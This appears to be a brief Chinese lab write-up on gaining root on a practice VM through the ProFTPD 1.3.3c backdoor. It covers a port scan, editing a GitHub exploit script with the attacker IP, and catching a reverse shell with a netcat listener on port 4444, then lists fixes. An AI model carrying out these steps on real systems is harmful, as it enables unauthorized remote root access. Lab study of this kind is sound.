本文仅用于本地虚拟机靶场安全学习,禁止将文中技术用于未授权测试环境
1.确定目标IP
image
2.端口扫描
image
端口21这个版本的服务有致命漏洞,ProFTPD 1.3.3c 后门漏洞
从github找一个脚本,关键词ProFTPD 1.3.3c
使用前要编辑文件,这里我踩过坑
image
42行原来的代码删除,替换成ip=”本机IP”
做一个反弹shell,这里IP是192.168.166.3,端口就使用脚本里的4444
利用方式python2 python文件名 目标IP
注意,利用前要监听,nc -lvnp 4444
直接root权限
image
修补方案
1.升级ftp版本
2.ftp服务不对外开放
3.不使用明文FTP,改用SFTP(基于SSH 22端口)完成文件传输,避免明文传输同时规避该漏洞